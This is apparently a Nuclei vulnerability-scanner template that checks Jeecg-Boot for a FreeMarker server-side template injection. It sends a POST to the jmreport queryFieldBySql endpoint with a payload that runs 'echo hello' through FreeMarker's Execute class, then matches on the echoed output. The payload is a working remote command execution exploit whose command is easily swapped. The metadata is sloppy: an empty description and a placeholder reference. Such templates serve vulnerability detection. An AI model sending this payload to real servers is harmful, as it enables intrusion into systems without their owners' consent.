id: Jeecg-Boot-SSTL-RCE

info:
  name: Jeecg-Boot SSTI 模板注入
  author: changge
  severity: high

  description: |
  reference:
    - https://127.0.0.1
  tags: yisaitong

http:
  - raw:
      - |
        POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
        Host: {{Hostname}}
        Origin: http://{{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: application/json
        Content-Length: 123

        {"sql":"select 'result:<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"echo hello\")}'"}'


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"hello")
